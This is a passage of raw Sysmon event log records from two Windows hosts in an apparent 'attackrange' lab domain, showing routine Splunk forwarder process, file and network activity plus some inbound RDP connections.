Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001057721Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:36.597{5EBD8912-8E88-6151-DA00-00000000FD01}5456C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000982083Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:36.301{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=172A98A00D995EBD25A640C45FDBC796,SHA256=D165AAD4AACD02C41A67B38704F2F5506F953FD6152C3D59484336D50719E9B0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000982082Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:33.465{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.3.202.198-57801-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001057732Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:37.971{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CB81B0B35F75100C727BFC3430C0607,SHA256=51570ADDF8378788A1E7CB5F55A0DE7A01BC824E37590E22B5B6444CB724B588,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000982097Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:37.457{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8E89-6151-367A-00000000FD01}736C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982096Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:37.457{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982095Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:37.457{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982094Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:37.457{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982093Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:37.457{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982092Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:37.457{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982091Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:37.457{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982090Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:37.457{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982089Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:37.457{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982088Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:37.457{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982087Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:37.457{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8E89-6151-367A-00000000FD01}736C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000982086Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:37.457{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8E89-6151-367A-00000000FD01}736C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000982085Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:37.442{69CF5F33-8E89-6151-367A-00000000FD01}736C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001057731Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:37.612{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8F3DC6EA471896C4461A609CC6291467,SHA256=308E939A22EC36100133281E1D04AB9A9C7F3750050180E8A49597FABA97E3BA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057730Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:35.082{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54309-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000982100Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:38.676{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3660FB593F179E6D7DD7C990AD79F99B,SHA256=2FDCA42969053ABBE96C1B68E71FE06A137167BDA5251EDE07983DECBFF9DA0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982099Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:38.082{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=807092ED9BA278394A328E4796332493,SHA256=C9BE8E21D18C16D7070B589BB74B163E8DD33C126604DFE369EFFAF1DED491FF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000982098Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:34.780{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59585-false10.0.1.12-8000- 23542300x8000000000000000982101Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:39.113{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27FEBAA429770F9CD6FA83E6C86B1DF1,SHA256=761E476F589E326F782F27ABCA4F8046D01CBA1D218FF52AE6CF558489EDB48F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057733Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:39.003{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1097914E1E1B3E8F402531B677E6BEA3,SHA256=97D4093E5B36DC2E0F895A7DBC3EFE098DB89265F1D24880BDB12D5FCB3E43D5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000982104Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:37.652{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-55737-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000982103Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:40.520{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A4DFBFCE629CCEFB0527C61A44463CF4,SHA256=512ACE86EC6EF09732DACAC95AF34CF5DF638B5D39D549935A9FACC28B3F53F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982102Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:40.270{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CFCD91151EA9A78C7714C633471EEB1,SHA256=03E3390E8E7F94A861CFDDD7966B3AD08EC5C7B62B6371E3D4324B64A7AD9D79,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057734Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:40.065{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1823974C4B36CECFA970A72F1FC13C5,SHA256=F7CD587E4D8138BA3683638BE171B8A8A58EE9132E78E2C34C0167ACA4C37554,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000982108Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:38.968{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-63524-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000982107Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:38.603{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-56303-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000982106Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:41.707{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=36776A1449C19F2262C002FBD48E93D2,SHA256=E8D2F9DD5189D2C425B5CBB528D5260F40E81C42D0A3CBBECEAE739D93F42721,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982105Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:41.301{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83AF9A7DDC528E25BDD6E692F79F9AB3,SHA256=DFE3BBDE02933A8CA677FA986845AD9E27529BBF48A666FCF378F1C962082384,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057735Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:41.097{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=434766E387B33D260957C80344143B77,SHA256=60A052189419E08AB2173A538334433C329EC8AEBC92AAB8DC3541FBFA44E643,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982109Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:42.395{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22DE83270C367EAD72220D76F570C81C,SHA256=1BA16F177B0E6BC5E82E965E71FC3EA6172263D6635FC88BBF63655C7E788E3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057736Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:42.161{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C864DAEC27B4D2725F79CDD937F9A10A,SHA256=6AED879D9F3CBD89E78A479236944B721DCC5AF97100AC06F6D253B8C0BB946C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982110Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:43.630{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4253C46733E7CD93BD207B7E4DE9C4F,SHA256=D96C8B1309D2E32FD061FA472533154FAEC9AE783B8F54EF04390D480F2F36B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057738Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:43.377{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB900CAE10C99FB2D389A84307BB5D1F,SHA256=4493FCC1BBA40CFCF454C5BF2433A38E1B1E1A9B8F644FCE8CAE62700D0CC38A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057737Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:40.957{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54310-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000982111Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:44.849{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A24815A8C9CD74783DA9D83935BE2D1E,SHA256=903231B5B273E56C9EB386B75F964899D43EE125D1917621A375891DC92C6D24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057741Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:44.893{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 